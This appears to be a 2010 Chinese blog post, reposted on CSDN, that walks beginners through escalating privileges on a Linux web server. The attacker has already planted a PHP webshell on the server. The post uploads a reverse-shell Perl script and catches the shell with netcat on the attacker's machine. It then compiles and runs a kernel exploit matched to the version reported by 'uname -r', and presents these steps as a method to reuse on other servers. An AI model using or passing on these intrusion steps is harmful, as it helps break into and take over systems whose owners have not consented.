关闭

linux溢出提权(适合刚学习linux提权的朋友)

1250人阅读 评论(0) 收藏 举报
本帖最后由 wjs 于 2010-4-3 14:26 编辑 

作者wjs
qq 825680101

我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0

然后执行 ./1.pl 本机IP 1224

然后本机监听nc -vv -l -p 1224,图1 反弹成功

输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,输入uname –r
返回:2.6.18-164.11.1.el5PAE

找对应的exp, 这里地址整理很齐全可以这里下
http://sebug.net/paper/linux_exp/ {此处经本人更改}

命令输入pwd,这个命令是显示当前目录,当前目录就是shell的目录,我在shell上传2.c
然后命令输入
Gcc –o 2 2.c  //把2.c编译成可执行文件
chmod +x 2 //给2有执行权限
./2 //执行2,2是溢出的 exp文件。图2
  

看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的 

0
0

猜你在找
【直播】机器学习&数据挖掘7周实训--韦玮
【套餐】系统集成项目管理工程师顺利通关--徐朋
【直播】3小时掌握Docker最佳实战-徐西宁
【套餐】机器学习系列套餐(算法+实战)--唐宇迪
【直播】计算机视觉原理及实战--屈教授
【套餐】微信订阅号+服务号Java版 v2.0--翟东平
【直播】机器学习之矩阵--黄博士
【套餐】微信订阅号+服务号Java版 v2.0--翟东平
【直播】机器学习之凸优化--马博士
【套餐】Javascript 设计模式实战--曾亮
查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:204898次
    • 积分:2303
    • 等级:
    • 排名:第16192名
    • 原创:17篇
    • 转载:129篇
    • 译文:1篇
    • 评论:5条
    文章分类
    最新评论